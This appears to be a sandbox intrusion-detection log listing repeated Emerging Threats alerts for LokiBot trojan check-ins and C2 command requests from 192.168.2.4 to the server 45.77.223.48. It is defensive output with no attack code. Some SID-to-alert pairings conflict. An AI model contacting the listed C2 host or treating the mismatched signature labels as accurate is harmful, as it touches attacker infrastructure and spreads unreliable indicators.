Timestamp:	04/26/24-04:43:38.519329
SID:	2024313
Source Port:	49804
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:41.660723
SID:	2024318
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:20.116742
SID:	2025381
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:46.212974
SID:	2024313
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:21.940707
SID:	2024318
Source Port:	49795
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:40.002816
SID:	2025381
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:01.472637
SID:	2025381
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:43.312556
SID:	2025381
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:17.632927
SID:	2021641
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:46.212974
SID:	2024318
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:21.940707
SID:	2024313
Source Port:	49795
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:05.836233
SID:	2024313
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:13.266385
SID:	2021641
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:08.959356
SID:	2025381
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:10.160803
SID:	2024318
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:55.707371
SID:	2024313
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:12.565966
SID:	2025381
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:57.146160
SID:	2025381
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:04.426692
SID:	2021641
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:10.160803
SID:	2024313
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:55.707371
SID:	2024318
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:29.146660
SID:	2024313
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:02.891159
SID:	2021641
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:41.435996
SID:	2021641
Source Port:	49806
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:29.146660
SID:	2024318
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:16.174844
SID:	2025381
Source Port:	49791
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:08.768305
SID:	2021641
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:32.693379
SID:	2025381
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:23.393350
SID:	2025381
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:30.595490
SID:	2021641
Source Port:	49801
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:19.056808
SID:	2024313
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:10.461205
SID:	2024318
Source Port:	49787
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:52.043341
SID:	2025381
Source Port:	49813
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:14.708232
SID:	2021641
Source Port:	49790
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:05.708325
SID:	2021641
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:27.753457
SID:	2021641
Source Port:	49799
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:19.056808
SID:	2024318
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:42.908989
SID:	2025381
Source Port:	49807
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:10.461205
SID:	2024313
Source Port:	49787
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:44.797094
SID:	2021641
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:21.613500
SID:	2021641
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:49.953966
SID:	2024318
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:26.179565
SID:	2024318
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:49.953966
SID:	2024313
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:26.179565
SID:	2024313
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:35.607137
SID:	2025381
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:26.329932
SID:	2025381
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:00.052049
SID:	2024313
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:24.904349
SID:	2021641
Source Port:	49797
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:29.172203
SID:	2025381
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:47.670237
SID:	2025381
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:18.687770
SID:	2024313
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:07.513137
SID:	2024318
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:14.041821
SID:	2024318
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:18.687770
SID:	2024318
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:24.705958
SID:	2021641
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:14.041821
SID:	2024313
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:34.173942
SID:	2021641
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:00.052049
SID:	2024318
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:02.935480
SID:	2025381
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:58.597395
SID:	2024313
Source Port:	49779
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:08.768305
SID:	2025381
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:58.597395
SID:	2024318
Source Port:	49779
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:07.513137
SID:	2024313
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:41.660723
SID:	2021641
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:19.056808
SID:	2025381
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:42.908989
SID:	2024313
Source Port:	49807
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:21.940707
SID:	2021641
Source Port:	49795
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:52.847994
SID:	2025381
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:04.288590
SID:	2025381
Source Port:	49783
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:07.242464
SID:	2024318
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:07.242464
SID:	2024313
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:34.068335
SID:	2025381
Source Port:	49802
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:17.632927
SID:	2025381
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:44.358398
SID:	2024318
Source Port:	49808
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:38.508836
SID:	2024318
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:35.596260
SID:	2025381
Source Port:	49803
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:13.266385
SID:	2025381
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:38.508836
SID:	2024313
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:23.188583
SID:	2025381
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:11.850756
SID:	2024313
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:20.116742
SID:	2021641
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:42.908989
SID:	2024318
Source Port:	49807
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:20.496255
SID:	2021641
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:17.251353
SID:	2024313
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:30.595490
SID:	2024318
Source Port:	49801
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:45.956580
SID:	2025381
Source Port:	49809
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:02.935480
SID:	2021641
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:30.595490
SID:	2024313
Source Port:	49801
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:11.850756
SID:	2024318
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:17.251353
SID:	2024318
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:51.405219
SID:	2025381
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:14.708232
SID:	2024313
Source Port:	49790
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:01.472637
SID:	2024318
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:05.708325
SID:	2024318
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:46.212974
SID:	2025381
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:05.708325
SID:	2024313
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:57.146160
SID:	2024318
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:57.146160
SID:	2024313
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:35.607137
SID:	2021641
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:39.893817
SID:	2021641
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:44.797094
SID:	2024318
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:05.836233
SID:	2025381
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:10.160803
SID:	2025381
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:44.797094
SID:	2024313
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:54.249806
SID:	2024313
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:26.179565
SID:	2021641
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:54.249806
SID:	2024318
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:01.472637
SID:	2024313
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:49.953966
SID:	2021641
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:40.002816
SID:	2021641
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:04.426692
SID:	2025381
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:15.814851
SID:	2025381
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:14.708232
SID:	2024318
Source Port:	49790
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:44.358398
SID:	2021641
Source Port:	49808
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:43:24.904349
SID:	2024318
Source Port:	49797
Destination Port:	80
Protocol:	TCP
